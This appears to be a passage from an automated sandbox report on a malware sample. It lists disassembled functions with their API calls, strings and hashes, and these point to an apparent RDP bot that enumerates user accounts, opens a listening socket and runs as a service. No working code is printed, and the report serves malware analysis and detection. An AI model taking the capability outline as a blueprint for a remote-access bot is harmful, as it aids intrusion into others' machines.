Instruction Fuzzy Hash: E3F0816A808F8582E211DF1CE0012ABF370FF9E389FA05326EBC926624DF3DD1429700

Function 00007FF73AFBA719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF73AFBA78A

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF73AFBA719
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF73AFBA77D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
Instruction ID: 89250ca0098f24f93efaa3cc87a0d0ce13b325175ec918bc03b5fe902c45d746
Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
Instruction Fuzzy Hash: ADF0816A808F8582E211DF1CE0012ABF370FF9E389FA05326EBC926624DF3DD5029710

Function 00007FF73AFBA72B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF73AFBA78A

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF73AFBA72B
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF73AFBA77D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
Instruction ID: d1b4b79cd2f6f8e79556ec46683fa0c14c3d08471348f86726a388d210f54992
Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
Instruction Fuzzy Hash: 4BF0816A808F8592E211DF1CE0412ABF370FF9E389FA05326EBC926624DF3DD1029700

Function 00007FF73AFBA710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF73AFBA78A

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF73AFBA710
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF73AFBA77D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
Instruction ID: afd0dec3a491d0a8759b1f8225daaf4da00e228e9846b57652f15714ef64b54c
Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
Instruction Fuzzy Hash: AAF0816A808F8582E211DF1CE0012ABF370FF9E789FA05326EBC926625DF3DD1029710

Function 00007FF73AFBA707 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF73AFBA78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF73AFBA77D
Argument domain error (DOMAIN), xrefs: 00007FF73AFBA707

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
Instruction ID: 1c25385fc98e6a2216f059bfb54bca9659ad5431e3eaac16f4c5791fdef2be53
Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
Instruction Fuzzy Hash: 16F0816A808F8592E211DF1CE0012ABF370FF9E789FA05326EBC926625DF3DD1029700

Function 00007FF73AFBA734 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF73AFBA78A

Strings

Argument singularity (SIGN), xrefs: 00007FF73AFBA734
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF73AFBA77D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
Instruction ID: 94534d71350d0a36106a9eb2b3e7caf2467ed10f266c91f72aca6fc646cbe2f0
Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
Instruction Fuzzy Hash: CCF01D6A808F8582D2119F19E4012ABB370FF9E789F605726EFC826625DF2DD5429700

Analysis Process: dx4w727xyq6q2yaxja.exePID: 3744, Parent PID: 6728COMMON

Executed Functions

Function 00007FF6CE9812FD Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2031075049.00007FF6CE981000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CE980000, based on PE: true

Associated: 0000000C.00000002.2031060871.00007FF6CE980000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2031093025.00007FF6CE990000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2031093025.00007FF6CEF8C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2031836984.00007FF6CF39E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2031857852.00007FF6CF3A6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2031857852.00007FF6CF3A8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2031900304.00007FF6CF3A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2031920467.00007FF6CF3AC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6ce980000_dx4w727xyq6q2yaxja.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
Instruction ID: 7337c5e3b2e32c8a8906608ffcdf5b1cd65050f95b48d354eb40bd099d7b9067
Opcode Fuzzy Hash: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
Instruction Fuzzy Hash: C7B01231A0424184F7002F43D88125C7770AB14702F505031D44C5B373CF7D54404B60

Analysis Process: main.exePID: 7108, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00007FFE0E136DA3 Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 332
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

LocalAlloc.KERNEL32 ref: 00007FFE0E136DD8
wcsncpy.MSVCRT ref: 00007FFE0E136E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E136E63
GetLastError.KERNEL32 ref: 00007FFE0E136E75
GetLastError.KERNEL32 ref: 00007FFE0E136EBE
LocalAlloc.KERNEL32 ref: 00007FFE0E136EED
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E136F29
LocalFree.KERNEL32 ref: 00007FFE0E136F36
GetLastError.KERNEL32 ref: 00007FFE0E136F41

Part of subcall function 00007FFE0E1340D2: EnterCriticalSection.KERNEL32 ref: 00007FFE0E1341A3
Part of subcall function 00007FFE0E1340D2: LeaveCriticalSection.KERNEL32 ref: 00007FFE0E1341CB
Part of subcall function 00007FFE0E1340D2: CopyFileA.KERNEL32 ref: 00007FFE0E134228

GetProcessHeap.KERNEL32 ref: 00007FFE0E137234
HeapAlloc.KERNEL32 ref: 00007FFE0E137245

Strings

mem_alloc, xrefs: 00007FFE0E136DA6, 00007FFE0E13725B
sid_to_str, xrefs: 00007FFE0E1370CA
[E] (%s) -> ConvertSidToStringSid failed(gle=%lu), xrefs: 00007FFE0E1370D1
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E136DAD, 00007FFE0E137262
[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x), xrefs: 00007FFE0E1370B0
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E136E87, 00007FFE0E136ED3, 00007FFE0E136F53
D, xrefs: 00007FFE0E136DF5
users_sync, xrefs: 00007FFE0E136E80, 00007FFE0E136ECC, 00007FFE0E136F4C, 00007FFE0E1370A9

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
API String ID: 3624467404-104752423
Opcode ID: 2e2958dbf98501d3ab173c986b780afff19839acce68fadd3af11913b5c6b7ac
Instruction ID: 75dd09ee62b2cdabd207f0f8050122cca3cc3e9a40b897487fe60133689a2dbc
Opcode Fuzzy Hash: 2e2958dbf98501d3ab173c986b780afff19839acce68fadd3af11913b5c6b7ac
Instruction Fuzzy Hash: 2CF16CA2A0CA4286FB60CB64E4843BE73A1EB85754F154037D9CE477B9DE7CE845C741

Function 00007FFE0EB45BF3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FFE0EB45C39
strcpy.MSVCRT ref: 00007FFE0EB45C54
FindFirstFileA.KERNEL32 ref: 00007FFE0EB45D27
GetLastError.KERNEL32 ref: 00007FFE0EB45D43
GetLastError.KERNEL32 ref: 00007FFE0EB45D72
FindClose.KERNEL32 ref: 00007FFE0EB45D90

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB45C97, 00007FFE0EB45CCF, 00007FFE0EB45D07
(name != NULL), xrefs: 00007FFE0EB45CC1
(path != NULL), xrefs: 00007FFE0EB45C89
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FFE0EB45DA8
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FFE0EB45D64
fs_dir_list, xrefs: 00007FFE0EB45C90, 00007FFE0EB45CC8, 00007FFE0EB45D00, 00007FFE0EB45D5D, 00007FFE0EB45DA1
(resume_handle != NULL), xrefs: 00007FFE0EB45CF9
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE0EB45C82, 00007FFE0EB45CBA, 00007FFE0EB45CF2

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-1535167640
Opcode ID: 4f4abd2465558705778aac330484c96298e1df306dc296a4cdd9c6c65dcce59e
Instruction ID: 6e808943c6d596cfbe12a729d3883151d926e660caee59667bc2dc2be5a77739
Opcode Fuzzy Hash: 4f4abd2465558705778aac330484c96298e1df306dc296a4cdd9c6c65dcce59e
Instruction Fuzzy Hash: F66149B2E0EB5386FB30AF55A8047B96250EF01365F840132E9DE5B2F5DE6CED858B41

Function 00007FF6EF6547A3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE ref: 00007FF6EF6547E9
_mbscpy.MSVCRT ref: 00007FF6EF654804
FindFirstFileA.KERNEL32 ref: 00007FF6EF6548D7
GetLastError.KERNEL32 ref: 00007FF6EF6548F3
GetLastError.KERNEL32 ref: 00007FF6EF654922
FindClose.KERNEL32 ref: 00007FF6EF654940

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

(resume_handle != NULL), xrefs: 00007FF6EF6548A9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF654847, 00007FF6EF65487F, 00007FF6EF6548B7
(path != NULL), xrefs: 00007FF6EF654839
(name != NULL), xrefs: 00007FF6EF654871
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF6EF654958
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF6EF654914
fs_dir_list, xrefs: 00007FF6EF654840, 00007FF6EF654878, 00007FF6EF6548B0, 00007FF6EF65490D, 00007FF6EF654951
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6EF654832, 00007FF6EF65486A, 00007FF6EF6548A2

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 1094913617-1535167640
Opcode ID: d1eaded348a0ad7f8d20c16922a4bb7f63fc925ea0b3ab5fe7d8790345d26317
Instruction ID: 1e808d096d00cc3a2354a36607fe14c722850cb4da6b03eeaebeda0e447a7186
Opcode Fuzzy Hash: d1eaded348a0ad7f8d20c16922a4bb7f63fc925ea0b3ab5fe7d8790345d26317
Instruction Fuzzy Hash: A0619127E1C55387FB604B44A4613B8236C6F00794F558972E89EEB2D7DE2EA844F34B

Function 00007FFE0E136D5F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0E136C7F: GetProcessHeap.KERNEL32 ref: 00007FFE0E136CCD
Part of subcall function 00007FFE0E136C7F: HeapFree.KERNEL32 ref: 00007FFE0E136CDE
Part of subcall function 00007FFE0E136C7F: GetProcessHeap.KERNEL32 ref: 00007FFE0E136CF2
Part of subcall function 00007FFE0E136C7F: HeapFree.KERNEL32 ref: 00007FFE0E136D03
Part of subcall function 00007FFE0E136C7F: LocalFree.KERNEL32 ref: 00007FFE0E136D19
Part of subcall function 00007FFE0E136C7F: GetProcessHeap.KERNEL32 ref: 00007FFE0E136D2D
Part of subcall function 00007FFE0E136C7F: HeapFree.KERNEL32 ref: 00007FFE0E136D3E

NetApiBufferFree.NETAPI32 ref: 00007FFE0E137283
NetUserEnum.NETAPI32 ref: 00007FFE0E1372F9
GetProcessHeap.KERNEL32 ref: 00007FFE0E137337
HeapAlloc.KERNEL32 ref: 00007FFE0E137348
memcpy.MSVCRT ref: 00007FFE0E137385
GetProcessHeap.KERNEL32 ref: 00007FFE0E13738A
HeapFree.KERNEL32 ref: 00007FFE0E13739B

Strings

[I] (%s) -> Done(sam_user_num=%u), xrefs: 00007FFE0E137528
mem_alloc, xrefs: 00007FFE0E136D86
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E1373EA
[E] (%s) -> NetUserEnum failed(enum_err=%08lx), xrefs: 00007FFE0E137413
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E136D8D
users_sync, xrefs: 00007FFE0E1373E3, 00007FFE0E13740C, 00007FFE0E137521

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Heap$Free$Process$AllocBufferEnumLocalUsermemcpy
String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
API String ID: 1987963910-3382179125
Opcode ID: 92aed0625b4e96070c7cd11b3d45800132d8ad76df3ecdda4df41ef72c2df09a
Instruction ID: 20860cc711349536eedfa3a103b009b6fc09f0aee134d13689966414c32ec8f2
Opcode Fuzzy Hash: 92aed0625b4e96070c7cd11b3d45800132d8ad76df3ecdda4df41ef72c2df09a
Instruction Fuzzy Hash: 31615DA2A0C74786FA609B64E84037AB691AF85794F240037DDDD477F1EE7DE895C301

Function 00007FFE133828BA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE133828D8
WSAGetLastError.WS2_32 ref: 00007FFE133829C2

Part of subcall function 00007FFE133827EA: setsockopt.WS2_32 ref: 00007FFE1338281A

htonl.WS2_32 ref: 00007FFE1338290A
htons.WS2_32 ref: 00007FFE1338291B
bind.WS2_32 ref: 00007FFE13382934
listen.WS2_32 ref: 00007FFE13382949
WSAGetLastError.WS2_32 ref: 00007FFE1338295A

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

WSAGetLastError.WS2_32 ref: 00007FFE13382984

Strings

[E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE133829A0
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE133829DA
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE13382A0E
tcp_listen, xrefs: 00007FFE1338296F, 00007FFE13382999, 00007FFE133829D3, 00007FFE13382A07
[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE13382976

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
API String ID: 3590747132-3524496754
Opcode ID: f81741f31f12baaca90571594b9371d39ed765417e1fc145e8fe1e463189f439
Instruction ID: 8c150e0a2fc5a11411f97b4f7bb540b6da7836c8908289ca56d3b6bfa8049ec1
Opcode Fuzzy Hash: f81741f31f12baaca90571594b9371d39ed765417e1fc145e8fe1e463189f439
Instruction Fuzzy Hash: ED31C321A0CE068DEA109B27E8002796291AF647B5F0403F5E97EA3BF4EE3CE441C708

Function 00007FF6EF651DBC Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF6EF651DD4
strcmp.MSVCRT ref: 00007FF6EF651DE7
StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF6EF651E23
_read.MSVCRT ref: 00007FF6EF651E79
GetLastError.KERNEL32 ref: 00007FF6EF651E98

Part of subcall function 00007FF6EF651A63: FreeLibrary.KERNEL32(?,?,00000000,000001FC7A4F13D0,00007FF6EF651E50,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508), ref: 00007FF6EF651AA1
Part of subcall function 00007FF6EF651A63: GetProcessHeap.KERNEL32(?,?,00000000,000001FC7A4F13D0,00007FF6EF651E50,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508), ref: 00007FF6EF651AD4
Part of subcall function 00007FF6EF651A63: HeapFree.KERNEL32(?,?,00000000,000001FC7A4F13D0,00007FF6EF651E50,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508), ref: 00007FF6EF651AE5

Part of subcall function 00007FF6EF651B1C: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6EF651E55,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508,00000000), ref: 00007FF6EF651B4D
Part of subcall function 00007FF6EF651B1C: HeapFree.KERNEL32(?,?,00000000,00007FF6EF651E55,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508,00000000), ref: 00007FF6EF651B5E

Strings

main, xrefs: 00007FF6EF651EA3, 00007FF6EF651F84
[E] (%s) -> No a valid run mode(mode=%s), xrefs: 00007FF6EF651F8B
[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu), xrefs: 00007FF6EF651EAA
service, xrefs: 00007FF6EF651DDD, 00007FF6EF651E37
RDP-Controller, xrefs: 00007FF6EF651DF4
